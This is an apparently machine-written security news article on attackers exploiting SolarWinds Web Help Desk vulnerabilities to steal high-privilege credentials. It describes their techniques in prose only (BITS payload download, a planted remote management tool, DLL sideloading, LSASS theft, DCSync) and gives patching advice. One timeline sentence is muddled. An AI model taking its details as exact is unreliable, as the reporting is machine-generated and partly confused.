Ethical Hacking News
In a recent cyberattack, malicious actors successfully exploited vulnerabilities in the SolarWinds Web Help Desk (WHD) software to gain unauthorized access to high-privilege credentials within several organizations' IT environments. Despite not yet confirming which bug was used by the attackers, security teams are advised to take immediate action to patch their WHD software and protect against this type of attack.
The SolarWinds Web Help Desk (WHD) software was exploited in a recent cyberattack, allowing malicious actors to gain unauthorized access to high-privilege credentials.The attackers used at least one of three critical vulnerabilities: CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399, which allow remote code execution and can be used by an unauthenticated attacker to execute OS commands on affected systems.A critical untrusted deserialization flaw (CVE-2025-40551) was recently disclosed and has a high severity rating of 9.8 CVSS.The attackers abused the Background Intelligent Transfer Service (BITS) for payload download and execution, using "living off the land" techniques to use legitimate administrative tools for malicious purposes.The intruders also used DLL sideloading and stole credentials from LSASS memory, indicating high-privilege access to sensitive domain users and groups.Security teams are advised to apply WHD patches immediately, remove unauthorized RMM tools, rotate credentials, and isolate compromised hosts to mitigate this attack.
In a recent cyberattack, malicious actors successfully exploited vulnerabilities in the SolarWinds Web Help Desk (WHD) software to gain unauthorized access to high-privilege credentials within several organizations' IT environments. The attack, which occurred in December 2025, involved the use of previously disclosed and newly discovered bugs in the WHD software.
According to Microsoft researchers, who are currently investigating the intrusions, the attackers exploited at least one of three critical vulnerabilities: CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399. These flaws allow remote code execution and can be used by an unauthenticated attacker to execute OS commands on affected systems.
The most recently disclosed vulnerability, CVE-2025-40551, is a critical untrusted deserialization flaw that earns a 9.8 CVSS rating, indicating its high severity. The bug was reported just a week after the vendor issued a security advisory urging customers to patch the vulnerability. In response to this advisory, the US Cybersecurity and Infrastructure Security Agency added the bug to its Known Exploited Vulnerabilities catalog, requiring federal agencies to patch the security hole within three days.
SolarWinds patched CVE-2025-40536, another high-severity (8.1 CVSS) security control bypass vulnerability that can allow an unauthenticated attacker to gain access to certain restricted functionality. However, this one has not yet appeared on CISA's exploited bugs catalog.
On the other hand, CVE-2025-26399 is a critical, 9.8-severity flaw that also allows remote, unauthenticated attackers to run commands on a host machine. SolarWinds attempted to patch this one three times before the fix finally worked. The researchers noted that this vulnerability is a patch bypass of CVE-2024-28988, which in turn is a patch bypass of CVE-2024-28986.
After exploiting one of the SolarWinds WHD bugs, the compromised devices spawned PowerShell to abuse the Background Intelligent Transfer Service (BITS) for payload download and execution. BITS is a built-in Windows operating system feature used to manage file transfers between machines. Attackers have found a way to use BITS for mischief – in this case, downloading and executing malware. This technique, known as "living off the land," involves using legitimate administrative tools that are already installed on victims' machines for malicious purposes.
The attackers also downloaded and installed Zoho ManageEngine, a legitimate remote monitoring and management (RMM) product, to provide long-term, remote control of the compromised system. Using this remote management tool, the intruders enumerated sensitive domain users and groups, including Domain Admins, and established reverse SSH and RDP access for persistence.
In some environments, Microsoft Defender also observed and raised alerts flagging attacker behavior on creating a scheduled task to launch a QEMU virtual machine under the SYSTEM account at startup. This effectively hid malicious activity within a virtualized environment while exposing SSH access via port forwarding.
Furthermore, in some cases, the attackers used DLL sideloading to access Windows Local Security Authority Subsystem Service (LSASS) memory and steal credentials. In one instance, activity escalated to DCSync from the original access host, indicating use of high-privilege credentials to request password data from a domain controller.
To mitigate this attack, security teams are advised to apply the WHD patches immediately and remove public access to admin paths. They should also scan for and evict unauthorized RMM tools, specifically ManageEngine RMM artifacts such as ToolsIQ.exe, Microsoft suggests. Additionally, it is recommended to rotate credentials – particularly those that can be accessed by users reaching SolarWinds Web Help Desk – and isolate any known compromised hosts.
Related Information:
https://www.ethicalhackingnews.com/articles/Cybercrime-Actors-Exploit-SolarWinds-WHD-Bug-to-Steal-High-Privilege-Credentials-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/02/09/solarwinds_mystery_whd_attack/
https://www.newsbreak.com/news/4485164991907-someone-s-attacking-solarwinds-whd-to-steal-high-privilege-credentials-but-we-don-t-know-who-or-how
https://www.theregister.com/2026/02/09/solarwinds_mystery_whd_attack/
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://www.cvedetails.com/cve/CVE-2025-40551/
https://nvd.nist.gov/vuln/detail/CVE-2025-40536
https://www.cvedetails.com/cve/CVE-2025-40536/
https://nvd.nist.gov/vuln/detail/CVE-2025-26399
https://www.cvedetails.com/cve/CVE-2025-26399/
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://www.huntress.com/cybersecurity-101/topic/what-is-apt-group
Published: Wed Feb 18 03:09:48 2026 by llama3.2 3B Q4_K_M
